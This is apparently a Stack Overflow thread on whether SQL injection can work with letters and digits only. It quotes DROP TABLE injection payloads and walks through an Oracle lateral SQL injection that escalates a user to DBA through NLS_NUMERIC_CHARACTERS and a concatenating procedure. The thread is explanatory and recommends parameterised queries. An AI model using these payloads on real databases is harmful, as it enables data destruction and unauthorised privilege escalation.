# A string with Letter and Number only can inject SQL statement

Tags: sql, sql-injection

I am new to SQL injection and read some article, many hackers may use ';' and space ' 'in their input, for example:

(1) username = '123;drop table account'

(2) username = '123 and 1=1'

But the question is, if we only allow user to type letter (both upper and lower case) and number on client side, no any other character like space, semicolon is allowed, is there any string exists can inject SQL statement?? If so, can anyone give me an example? Thanks!

please note that I don't ask if client side can prevent SQL injection, I just wonder if such string with letter and number only exists to do SQL injection.

Comment: You can prevent SQL injection by using parameters.  That is the right way.

Comment: @GordonLinoff thanks! I know there is some way to prevent it, but I mainly want to know any example using only letter or number can cause SQL inject, thank you!

Comment: Yes it is never a good idea to rely on client side. Imagine you have written some javascript to do the prevention and you do not allow the user to type invalid chars. What will happen if the user turns off javascript on their browser? Boom, right? The other question you need to ask yourself is what exactly is "client"? In some cases the developers writing the client are not the same devs who write the server. How do you guarantee the client developers will prevent this?

Comment: @CodingYoshi， Thanks! I know what you mean, but my question is focused on 'SQL syntax', I just want to know a string syntax, can inject SQL statement with only letter and number.

Comment: Even if you use ajax, If I find out the URL and some other info, I will not even use a browser, I will just write some code and interact with your server programmatically and hack. No with digits only, you cannot (easily) do sql injection but still possible. But the only reason for using parameters is not to avoid sql injection, it has other reasons too; for example, it is cleaner code and preparing for the future in case you change you mind about only allowing digits.

Answer (score 4):

Firstly, **anything you do on the client-side can be bypassed**. The easiest way to remember this is to replace "client-side" with "on the attacker's computer, over which they have complete control".

In the specific case of a website, this might be as simple as the attacker pressing F12 on their browser and editing the page, or it might require them to craft an HTTP request using some other means, but the most you can do is slow them down by a few minutes while they figure it out. **You do not have any control over what data an attacker can attempt to send you.**

Secondly, I can't think of an attack that would work using only digits and non-accented characters, *but that doesn't mean there isn't one*. On the other hand, I can't think of many places where constraining the input in that way would still result in useful functionality. Whitelist-based validation (*on the server side*) certainly has its place, but the need to come up with the right whitelist for every scenario makes it an awkward mechanism for security.

As such, you are better off *first* ensuring that you are using correct escaping for wherever you use your data (escaping is *always* about output / usage, never about input / source), and separating data from code wherever possible (e.g. using parametrised queries rather than including data in SQL strings). Once you have that working, whitelist-based validation may be a sensible additional step.

Comment: Thanks! So the answer regarding 'SQL statement syntax' is NO, impossible, right? That's what I want to ask, I know user can edit client side, I just want to know a syntax question, because I really cannot come up with an example using letter and number which can inject SQL

Comment: As Bill Karwin says, it's not impossible that some feature could be exploited in this case. In the end, you're better off using escaping and parametrisation correctly, and then you don't need to worry about such edge cases.

Answer (score 3):

What I understand from all your comments is that you are asking this:

> Is it possible to do a SQL Injection where we only allow the user to enter numbers and characters A to Z (upper and lower case)?

In other words, you are saying that in order to do SQL Injection the user needs to be able to enter characters such as `-` and `'` as demonstrated in [Bobby Tables](https://stackoverflow.com/questions/332365/how-does-the-sql-injection-from-the-bobby-tables-xkcd-comic-work) with this malicious user entry:

```
Robert'); DROP TABLE STUDENTS; --
```

**Short Answer**

Yes, it is possible.

**Long Answer**

You, or we, may think there is NO way of doing a SQL Injection using numbers only but there may happen to be someone out there who will be clever enough to figure out a way. *And someone did figure out a way in Oracle!*

Imagine we have this function:

```
CREATE OR REPLACE FUNCTION P01
RETURN NUMBER
AUTHID current_user
IS
PRAGMA autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'grant dba to scott';
RETURN 1;
END;
```

So it is pretty straight forward: A function named `P01` that will make `scott` the dba. Is there any way for us to execute this function without having the privileges of granting users roles? For example, if you are logged in as someone who is not a dba and you issue this command, it will fail:

```
SET ROLE dba;
```

It will fail and produce this error:

```
set role dba
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist
```

**Hacker's Goal**

How can I execute the function `P01` and make myself the dba?

**Finding the Vulnerability**

Here is a function which *ONLY* accepts a numeric parameter but we will see that we can do a SQL Injection here:

```
1 CREATE OR REPLACE PROCEDURE NUM_PROC(n NUMBER)
2 IS
3 stmt VARCHAR2(2000);
4 BEGIN
5 stmt := 'select object_name from all_objects where object_id = ' || n;
6 EXECUTE IMMEDIATE stmt;
7 END;
```

The parameter is concatenated to the end of the sql statement. But in order to do the concatenation, it must be converted from a number to string. The weakness, vulnerability, lies within how the Oracle engine converts a number to a string.

> According to [this](https://docs.oracle.com/cd/B28359_01/server.111/b28320/initparams144.htm#REFRN10126), Oracle uses the session variable
>   NLS_NUMERIC_CHARACTERS when converting a NUMERIC value to a string. The format of
>   NLS_NUMERIC_CHARACTERS is a string where the first character specifies the decimal separator and the second character specifies the group separator.

If we issue this query:

```
SELECT TO_NUMBER('1.01', '0D00') FROM dual;
```

it will convert the string `1.01` to the number `1.01`. But if we change the `NLS_NUMERIC_CHARACTERS` like this:

```
ALTER SESSION SET NLS_NUMERIC_CHARACTERS='P ';
```

and issue this query:

```
SELECT TO_NUMBER('1P01', '0D00') FROM dual;
```

it will convert the string `1P01` to the number `P01` (recall that `P` is decimal separator since we set `NLS_NUMERIC_CHARACTERS` to `P`). Aha! It has converted it to `P01` which also happens to be the name of the function which is the ultimate goal...ok a step closer.

**The Hack**

Even though the user does not have privileges, the user can now do this:

```
EXEC SYS.NUM_PROC(TO_NUMBER('P01', 'D00'));
```

As a refresher, here is the code for `SYS.NUM_PROC` again:

```
1 CREATE OR REPLACE PROCEDURE NUM_PROC(n NUMBER)
2 IS
3 stmt VARCHAR2(2000);
4 BEGIN
5 stmt := 'select object_name from all_objects where object_id = ' || n;
6 EXECUTE IMMEDIATE stmt;
7 END;
```

since `TO_NUMBER('P01', 'D00')` will produce `P01` as output, the `stmt` will have this assigned to it:

```
select object_name from all_objects where object_id = 1P01
```

and it will execute the statement immediately and `1P01` is executed. Goal accomplished. *Hack accomplished and user is now dba!*

And of course I am not smart enough to come up with all this, I got the info from [Lateral SQL Injection](http://www.davidlitchfield.com/Lateral_SQL_Injection_Revisited_Final.pdf).

Answer (score 2):

Some cases of SQL injection use hex-encoding to hide a string value from filters. If your client side code filters only that the value has letters and numbers, that still allows long strings of hex digits, and this could be decoded by your server as it is interpolated into SQL.

And I agree with @IMSoP, you shouldn't rely on client-side code at all. Any attacker could modify the client-side code and bypass the checks you had written. Better to use parameterized queries on the server-side.

Comment: Hex digits indeed make sense. But, server can determine whether decode what coming in or not? I mean, decode mechansim should be implemented by developer, and probably server just put what he received into SQL query statement?

Comment: It depends on the SQL statement. In SQL, a string of hex digits interpolated into SQL is automatically treated like a quoted string of characters.

Comment: Thanks! First time to know this new knowledge!

Comment: Admittedly, it could be a rare example where an attacker could succeed in doing something truly damaging using only a hex string. But it only takes one counter-example to disprove that it's *impossible*.